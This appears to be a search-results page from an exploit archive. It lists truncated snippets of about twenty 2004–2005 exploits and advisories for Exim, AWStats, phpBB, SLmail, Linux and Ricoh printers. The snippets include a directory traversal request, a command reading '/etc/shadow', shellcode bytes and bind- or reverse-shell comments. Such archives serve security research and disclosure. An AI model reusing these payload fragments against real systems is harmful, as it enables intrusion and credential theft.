1697 matches found
KStars: Buffer overflow in fliccd
Background KDE is a feature-rich graphical desktop environment for Linux and Unix-like Operating Systems. KStars is a desktop planetarium for KDE. It includes support for the Instrument Neutral Distributed Interface INDI. Description Erik Sjolund discovered a buffer overflow in fliccd which is pa...
Microsoft Internet Explorer 5.0.1 - Mouse Event URI Status Bar Obfuscation
source: https://www.securityfocus.com/bid/12541/info Microsoft Internet Explorer is reported prone to a URI obfuscation weakness. The issue presents itself when a HREF tag contains certain mouse events. This issue may be leveraged by an attacker to display false information in the status bar or U...
Exim <= 4.43 auth_spa_server() Remote PoC Exploit
Exploit for linux platform in category remote exploits ================================================= Exim Howdy : This is pretty straightforward, an exploit for the recently discovered vulnerability in Exim's all versions prior to and including 4.43 SPA authentication code - spabase64tobits...
Chipmunk Forums SQL Injection Exploit
Exploit for unknown platform in category web applications ===================================== Chipmunk Forums SQL Injection Exploit ===================================== /==========================================/ // GHC - Chipmunk forum - ADVISORY // Product: Chipmunk Forums // URL:...
Chipmunk Forums SQL Injection Exploit
No description provided by source. /==========================================/ // GHC - Chipmunk forum - ADVISORY // Product: Chipmunk Forums // URL: http://www.chipmunk-scripts.com/board // VULNERABILITY CLASS: SQL injection // RISK: hight /==========================================/ exploit at...
XOOPS Module module 3.0 - Directory Traversal
XOOPS Module module 3.0 - Directory Traversal source: https://www.securityfocus.com/bid/12406/info Xoops Incontent module is reported prone to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. A malicious user could...
AWStats configdir Remote Command Execution Exploit (c code)
Exploit for cgi platform in category web applications =========================================================== AWStats configdir Remote Command Execution Exploit c code =========================================================== / AwStats exploit by Thunder, email protected This exploit makes...
AWStats 6.0 6.2 - configdir Remote Command Execution (Perl)
AWStats 6.0 6.2 - configdir Remote Command Execution Perl !/usr/bin/perl ---GHC--------------------------------- Remote command execution exploit Product: Advanced Web Statistics 6.0 - 6.2 URL:http://awstats.sourceforge.net Greets & respects to our friends: 1dt.w0lf and all rst.void.ru Special...
fkey 0.0.2 - Local File Accessibility
/ fkeyv0.0.2: local/remote file accessibility exploit. by: vade79/v9 [email protected] fakehalo/realhalo netris homepage/URL: http://www.freshmeat.net/projects/fkey compile: gcc xfkey.c -o xfkey syntax: ./xfkey /etc/shadow 2/savefilename bug: fkey is a finger-like daemon for accessing remote files i...
NodeManager Professional 2.00 - Remote Buffer Overflow
/ Included stdio.h for my compile errors /str0ke / // // NodeManager Professional V2.00 Buffer Overflow Vulnerability // Bind Shell Exploit for English Win2K/XP // 21 Dec 2004 // // NodeManager Professional is a network management and monitoring tool. // It receives SNMPv1 traps and displays them...
QWikiwiki Directory Traversal Vulnerability
Exploit for unknown platform in category web applications =========================================== QWikiwiki Directory Traversal Vulnerability =========================================== REQUEST: http://SERVER/qwiki/index.php?page=../config.php%00 0day.today 2018-02-18...
CMDExe.txt
This unpatched vulnerability is a variant of the "Auto SP2 RC Exploit" Solution : Set the security level for all zones to "High" in Internet Explorer // index.htm // locate.HHClick;setTimeout"locator.HHClick",100;setTimeout "window.opener=null;window.close",10000 // htm.txt // document.write" par...
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
Exploit for unknown platform in category web applications ========================================================= Sanity.b - phpBB newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print $sock "GET /aolcom/search?q=$procura&Stage=0&page=$n HTTP/1.0\n\n"; @resu = ; close$sock; $ae = "@resu"...
SHOUTcast remote format string vulnerability
Product: SHOUTcast v1.9.4 and older? Vendor: http://www.shoutcast.com Vuln: Remote format string BugFinder: Tomasz Trojanowski onestep Author: Damian Put [email protected] www.CC-Team.org Date: Dec 23, 2004 1. BACKGROUND "SHOUTcast is Nullsoft's Free Winamp-based distributed streaming audio syste...
Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)
include include include include include include include include include include define retadd "\x9f\x45\x3a\x77" /win2k server sp4 0x773a459f/ define port 110 / revshell العراق القراصنة المجموعة/ char shellcode = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"...
PHP 4.3.9 + phpBB 2.x - Unserialize() Remote Information Leak
PHP 4.3.9 + phpBB 2.x - Unserialize Remote Information Leak // Compiled version: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/697.rar phpbbmemorydump.rar // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: // compile with borland c+...
Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow
/ vcresize int overflow Copyright Georgi Guninski Cannot be used in vulnerability databases / include include include include include include include include include include int mainint ac, char av int fd; struct vtconsize vv; int cou=4242; fd=open"/dev/tty",ORDWR; if fd0 perror"open";return -42;...
Ricoh Aficio 450/455 PCL 5e Printer ICMP Denial of Service Exploit
No description provided by source. / RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhoufelixzhou at hotmail dot com Exploit Writer : x90cKyong [email protected]/jyj9782 Testing -----------------------------------------------...
Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service
/ RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit. DATE: 12.15.2004 Vuln Advisory : Hongzhen Zhou Exploit Writer : x90cKyong [email protected]/jyj9782 Testing ----------------------------------------------- root@testbed:/raw gcc -o rpclicmpdos rpclicmpdos.c root@testbed:/raw...
wget <= 1.9 Directory Traversal Exploit
Exploit for multiple platform in category remote exploits ======================================= wget = 1.9 Directory Traversal Exploit ======================================= !/usr/bin/perl -W wgettrap.poc -- A POC for the wget1 directory traversal vulnerability Copyright 2004 Jan Min=C3=A1=C5=...